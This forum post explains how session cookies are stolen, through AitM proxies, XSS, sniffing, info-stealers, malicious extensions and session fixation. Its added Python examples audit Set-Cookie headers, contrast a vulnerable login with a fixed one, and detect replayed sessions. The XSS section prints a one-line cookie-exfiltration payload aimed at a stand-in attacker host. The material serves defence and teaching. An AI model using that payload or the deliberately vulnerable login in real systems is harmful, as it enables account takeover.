Fixxx (Moderator)

Cookie theft is a form of cyberattack where attackers gain unauthorized access to a user's cookie files to steal confidential information. Cookies are small data fragments that websites store on a user's device to enhance interaction with web services. The browser stores cookies in a local SQLite database and automatically sends them with each HTTP request. Inside, there is only a string with the session ID, which confirms that the user has already been authenticated. If someone copies this ID and pastes it into their browser, the server will consider them "the same" user. Passwords, SMS codes and push confirmations become unnecessary. Cookies store various information about the user:
- Authentication and authorization data
- Personalization settings
- Shopping cart contents
- Session and preference information
By lifetime, cookies come in two kinds:
- Session cookies - deleted when the browser is closed
- Persistent cookies - stored on the user's device and contain data such as login credentials and preferences
How Hackers Steal Cookies
1. AitM Proxy (Evilginx and similar tools)
The Evilginx tool is a transparent proxy that mirrors the original login portal of Microsoft 365, Google or Okta. The user enters their login, password and confirms entry through a push notification, while the proxy quickly captures both the authorization cookie and the refresh token. This all happens in one HTTP cycle, so the delay is barely noticeable. After the theft, the attacker can not only read emails but also reset MFA, set up email forwarding rules and ask the administrator to "confirm" fraudulent transfers.
2. Cross-Site Scripting (XSS)
XSS attacks are one of the most common methods where an attacker injects malicious scripts into content viewed by other users. If a web application doesn't properly sanitize user input, the attacker can include a script in their input that, when executed by another user's browser, can steal that user's cookies. If the developer did not mark the cookie with the HttpOnly flag, JavaScript can read its contents. It's enough to inject a classic script like
fetch('//attacker.com/?c=' + document.cookie)
via XSS to intercept the token. Bug bounty statistics show that a quarter of all XSS vulnerabilities lead to cookie exports.
3. Session Hijacking
Also known as cookie theft, this method involves intercepting cookies that authenticate users on websites. If an attacker can capture a user's session cookie, they can impersonate that user. Session hijacking often occurs in unsecured public Wi-Fi networks, where attackers can analyze network traffic using tools like packet analyzers to capture cookies.
4. Man-in-the-Middle (MitM) Attacks
In a MitM attack, the hacker positions themselves between the user and the web application. This position allows them to intercept and manipulate data transmitted between them, including cookies. This method is particularly effective on unencrypted HTTP connections and can be executed using techniques like ARP spoofing in local networks or exploiting vulnerabilities in SSL/TLS protocols on the broader internet.
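The HttpOnly flag mentioned under XSS and the Secure flag that decides whether a cookie travels over plaintext HTTP are both set by the server in its Set-Cookie header. An added example (not code from the post) in Python: a small auditor that parses Set-Cookie headers and lists which of these protections, plus SameSite and the __Host- prefix, are missing, beside a function that builds the hardened header; the sample headers are constructed.

```python
"""Audit Set-Cookie headers for the attributes that blunt cookie theft.
Added example, not from the original post; sample headers are constructed."""
from dataclasses import dataclass, field


@dataclass
class CookieAudit:
    name: str
    findings: list = field(default_factory=list)

    @property
    def ok(self) -> bool:
        return not self.findings


def parse_set_cookie(header: str):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: value_or_True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value, attrs


def audit_set_cookie(header: str) -> CookieAudit:
    """Report the gaps that expose a session cookie to injected scripts or plaintext sniffing."""
    name, _value, attrs = parse_set_cookie(header)
    audit = CookieAudit(name)
    if "httponly" not in attrs:
        audit.findings.append("missing HttpOnly: readable via document.cookie by any injected script")
    if "secure" not in attrs:
        audit.findings.append("missing Secure: browser will also send it over plaintext HTTP")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        audit.findings.append("SameSite not Lax/Strict: sent along with cross-site requests")
    if not name.startswith("__Host-"):
        audit.findings.append("no __Host- prefix: a subdomain or plaintext origin could overwrite it")
    return audit


def hardened_set_cookie(name: str, value: str, max_age: int = 3600) -> str:
    """Build the header a server should send for a fresh session (all four protections)."""
    return f"__Host-{name}={value}; Path=/; Max-Age={max_age}; Secure; HttpOnly; SameSite=Lax"


# Constructed samples: the weak header the post describes, and the hardened form.
WEAK_HEADER = "sessionid=abc123; Path=/"
STRONG_HEADER = hardened_set_cookie("sessionid", "abc123")
```

Run `audit_set_cookie` over the Set-Cookie values your HTTP client returns; `audit_set_cookie(WEAK_HEADER).findings` lists all four gaps, while the hardened header audits clean.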
5. Phishing and Classic Phishing with 2FA Bypass
By deceiving users and prompting them to visit fake websites that resemble legitimate ones, hackers can encourage users to voluntarily provide their personal data. On fake login landing pages, attackers place code that relays data to the real service in real-time. The victim believes they are logging in "as usual," while in the background, the proxy captures the latest cookie. Such kits are sold in bulk on underground forums: you input a bait link, the logo of the desired service, and the constructor automatically generates a "trap" with a Telegram bot for sending tokens.
6. Info-stealers: RedLine, RisePro, LummaC
Compact trojan stealers are distributed through infected ads, fake Windows 11 ISO images, pirated cracks and key generators. Once launched, the malware:
- Finds Cookies.sqlite and Local State files in the Chromium profile
- Decrypts values via Windows CryptProtectData or Apple Keychain
- Packs cookies and tokens from Discord and Slack into a ZIP archive
- Sends the dump to a C2 server or a private Telegram channel of the operator.
In 2024, RedLine was responsible for infecting 55% of devices worldwide that suffered from stealer attacks.
7. Sniffing on Open Wi-Fi
Simple analysis of public networks shows that about 2% of websites still transmit authorization data over HTTP or do not set the Secure flag. Any sniffer in a café can see the line
Cookie: sessionid=...
in plain text. From there, it’s just a matter of importing it into a browser and your email is open.
8. Spy Browser Extensions
Fake extensions disguise themselves as tab managers or currency converters. After installation, they request permission for cookies, gaining visibility over all domains. After a few days, the module sends the cookie database to cloud storage. Since the extension is signed with a legitimate certificate from the Chrome Web Store, antivirus software doesn't flag it.
9. Token Sync in Cloud Services
Some SaaS platforms synchronize session tokens between mobile and desktop clients. If an attacker gains access to the smartphone's file system (through backup theft or physical device capture), cookies can be imported to a PC and used for login without a password.
10. Session Fixation via OAuth
In cases of flaws in the authorization flow, an attacker can present a victim with a pre-created session ID through the state parameter. After logging in, the victim continues to work in an already "marked" session, which the attacker controls and which is tied to their refresh token.
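Section 10 and section 11 below share one root cause: the application keeps the session identifier the browser presented before login. An added example, not code from the post, in Python: an in-memory session store with the vulnerable login beside the fixed one, which issues a fresh ID at authentication; `demo` runs the pre-set-ID scenario against each and reports whether the planted ID ended up authenticated.

```python
"""Session fixation: the vulnerable login beside the fixed one.
Added example, not from the original post. SessionStore is an in-memory
stand-in for a real session backend; secrets.token_urlsafe is the standard
library's CSPRNG-backed ID generator."""
import secrets


class SessionStore:
    def __init__(self):
        self.sessions = {}  # session_id -> {"user": str | None}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def get(self, sid: str):
        return self.sessions.get(sid)


def login_vulnerable(store: SessionStore, sid: str, user: str) -> str:
    """Keeps whatever ID the browser presented, so an attacker-chosen ID becomes authenticated."""
    if sid not in store.sessions:
        sid = store.new_session()
    store.sessions[sid]["user"] = user
    return sid


def login_fixed(store: SessionStore, sid: str, user: str) -> str:
    """Discards the pre-login ID and issues a fresh one, so a planted ID never becomes authenticated."""
    if sid in store.sessions:
        del store.sessions[sid]  # any other holder of the old ID now has a dead session
    new_sid = store.new_session()
    store.sessions[new_sid]["user"] = user
    return new_sid


def demo(login) -> bool:
    """Pre-set-ID scenario: an ID exists before login, the victim logs in with it,
    then check whether that same ID is now an authenticated session (True = vulnerable)."""
    store = SessionStore()
    planted = store.new_session()      # ID obtained before the victim ever logged in
    login(store, planted, "victim")    # victim authenticates while presenting that ID
    hijacked = store.get(planted)
    return hijacked is not None and hijacked["user"] == "victim"
```

`demo(login_vulnerable)` returns True and `demo(login_fixed)` returns False; the fix is the standard one, regenerate the session ID on every privilege change.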
11. Session Fixation
A specific type of attack on web sessions, where the attacker doesn't so much steal an existing cookie from the victim as cunningly forces the victim to use a session identifier that the attacker already knows. The attacker generates a valid session ID on the target site and passes this identifier to the victim - most often through a specially crafted URL. If the web application is vulnerable, it will not change the identifier when the user logs in. The victim clicks the link, enters their login and password and the site ties their authenticated session to the pre-set cookie. As a result, the attacker, knowing the session ID value, gains access to the victim's account.
Risks and Consequences of Cookie Theft
- Unauthorized Access - An attacker with a stolen session cookie can gain unauthorized access to a user's account, potentially viewing, modifying or deleting confidential information.
- Identity Theft - By accessing sensitive information such as names, addresses, Social Security numbers or financial data, attackers can use it for identity theft or other fraudulent activities.
- Financial Losses - Attackers can use stolen sessions to make unauthorized purchases, transfer funds or access financial accounts, leading to financial losses for users or businesses.
- Reputational Damage - Both individuals and organizations can suffer reputational harm due to session hijacking, as it may lead to unauthorized disclosure of personal or confidential information or unauthorized actions taken on behalf of the victim.
- Loss of Privacy - Cookie theft can result in a loss of user privacy, as attackers may gain access to personal messages, browsing history or other private data.
- Legal Consequences - Organizations that fail to adequately protect user data or maintain proper security measures may face legal repercussions, fines or penalties due to data breaches or non-compliance with privacy regulations.
- Loss of Productivity - Addressing the aftermath of a session hijacking attack can be time-consuming and costly for both individuals and organizations, leading to a loss of productivity as they work to resolve the issue, recover lost data or restore affected systems.
- Illegal Actions in Your Name - With access to your session, an attacker can perform illegal actions while impersonating you. For example, they may send spam and phishing messages to your contacts, post offensive or prohibited content on social media or conduct fraudulent transactions.
How to Know if Your Cookies Have Been Stolen
Detecting cookie theft early is crucial for protecting your accounts and data. Look for the following signs:
- Suspicious account activity, such as unauthorized logins or transactions
- Unexpected password reset notifications
- Unforeseen changes in account settings, such as email addresses, phone numbers or credentials
- Repeated logouts that may indicate session hijacking
- Unusual login notifications or strange network traffic
- Erratic browser behavior or alerts from security software
- An increase in spam or phishing messages
- Unidentified devices in security logs
- Strange browser behavior: redirects to unfamiliar sites, pop-ups
- Abnormal network activity: connections to unknown servers
- Actions in your account that you didn't perform: read messages, sent emails
- Simultaneous logins from different geolocations - your account is accessed from an IP address in another city or country.
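The last sign, one session used from two locations, can be checked from the application's access log instead of waited for. An added example, not from the post, in Python: it parses constructed log lines (the field order is an assumption about your log format) and flags any session ID that reappears from a different IP address or browser within 30 minutes of its previous use; an IP change stands in for a geolocation change, since no geo database is used offline.

```python
"""Flag a session cookie reused from a second client (IP or browser change).
Added example, not from the original post; the log lines and their field
order (time, user, session_id, client_ip, user_agent) are constructed."""
from datetime import datetime, timedelta

# Constructed access-log sample: sess-7f3a jumps to a new IP and browser within minutes.
SAMPLE_LOG = """\
2024-08-20T10:00:01Z alice sess-7f3a 203.0.113.10 Chrome/126 Windows
2024-08-20T10:05:12Z alice sess-7f3a 203.0.113.10 Chrome/126 Windows
2024-08-20T10:06:40Z alice sess-7f3a 198.51.100.77 Firefox/128 Linux
2024-08-20T10:07:02Z bob sess-91c2 192.0.2.44 Safari/17 macOS
2024-08-20T11:30:00Z bob sess-91c2 192.0.2.44 Safari/17 macOS
"""


def parse_log(text: str):
    """Turn each line into (timestamp, user, session_id, ip, user_agent)."""
    events = []
    for line in text.splitlines():
        ts, user, sid, ip, ua = line.split(" ", 4)
        events.append((datetime.fromisoformat(ts.replace("Z", "+00:00")), user, sid, ip, ua))
    return events


def find_replayed_sessions(events, window=timedelta(minutes=30)):
    """Return {session_id: reason} for IDs seen from a changed IP or user agent
    within `window` of their previous use."""
    last_seen = {}  # session_id -> (timestamp, ip, user_agent)
    alerts = {}
    for ts, user, sid, ip, ua in sorted(events, key=lambda e: e[0]):
        prev = last_seen.get(sid)
        if prev is not None and ts - prev[0] <= window:
            changes = []
            if ip != prev[1]:
                changes.append(f"ip {prev[1]} -> {ip}")
            if ua != prev[2]:
                changes.append(f"user agent {prev[2]!r} -> {ua!r}")
            if changes:
                alerts[sid] = f"user {user}: " + ", ".join(changes)
        last_seen[sid] = (ts, ip, ua)
    return alerts


if __name__ == "__main__":
    for sid, reason in find_replayed_sessions(parse_log(SAMPLE_LOG)).items():
        print(f"ALERT possible cookie replay on {sid}: {reason}")
```

A session cookie presented from a new address and a new browser minutes after its last use is the footprint an imported cookie leaves; invalidating that session server-side and forcing re-authentication is the usual response.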
How to Prevent Cookie Theft
- Use FIDO2 Keys and 2FA/MFA - Hardware tokens are resistant to phishing because domain verification is built into the authorization process.
- Apply Strong Password Policies - Create strong, unique passwords and update them regularly to minimize the risk of unauthorized access.
- Be Cautious of Phishing and Risky Websites - Stay vigilant against phishing attempts and avoid dangerous websites to prevent exposure to malware.
- Regularly Clear Browser Cache - Frequently clear your browser's cache and cookies to remove potentially compromised cookies.
- Keep Software Updated - Ensure your browser, operating system and security software are up to date.
- Avoid Using Public Wi-Fi - Whenever possible, avoid conducting sensitive operations on public Wi-Fi networks that may be insecure.
- Use Private Networks - When accessing websites through public networks, use a virtual private network (VPN) to protect your traffic.
- Review Browser Extensions - Check installed browser extensions and remove any unused or suspicious ones.
Recovery from Cookie Theft
- Change Passwords - Change your passwords on all affected accounts.
- Clear Browser Cache - Remove all cookies and browser cache to eliminate potentially compromised data.
- Enable Two-Factor Authentication - Activate 2FA on all accounts where possible for an additional layer of protection.
- Monitor Accounts - Keep a close eye on your accounts for any unusual activity.
- Update Security Settings - Review and update security settings on your devices and accounts.
Conclusion
The world has transitioned to a phase where tokens are more important than passwords. AitM proxies, info-stealers and modified extensions steal millions of cookies daily. Users must understand the risks associated with cookie theft and take proactive steps to protect against such attacks. By keeping software updated, using strong passwords, enabling two-factor authentication and remaining vigilant against phishing attempts, you can significantly reduce the risk of cookie theft and safeguard your personal information. Ultimately, cookie theft is not just a technical issue but a whole class of threats that requires constant vigilance and adaptation. The better we understand the mechanisms of these attacks, the more effectively we can defend against them.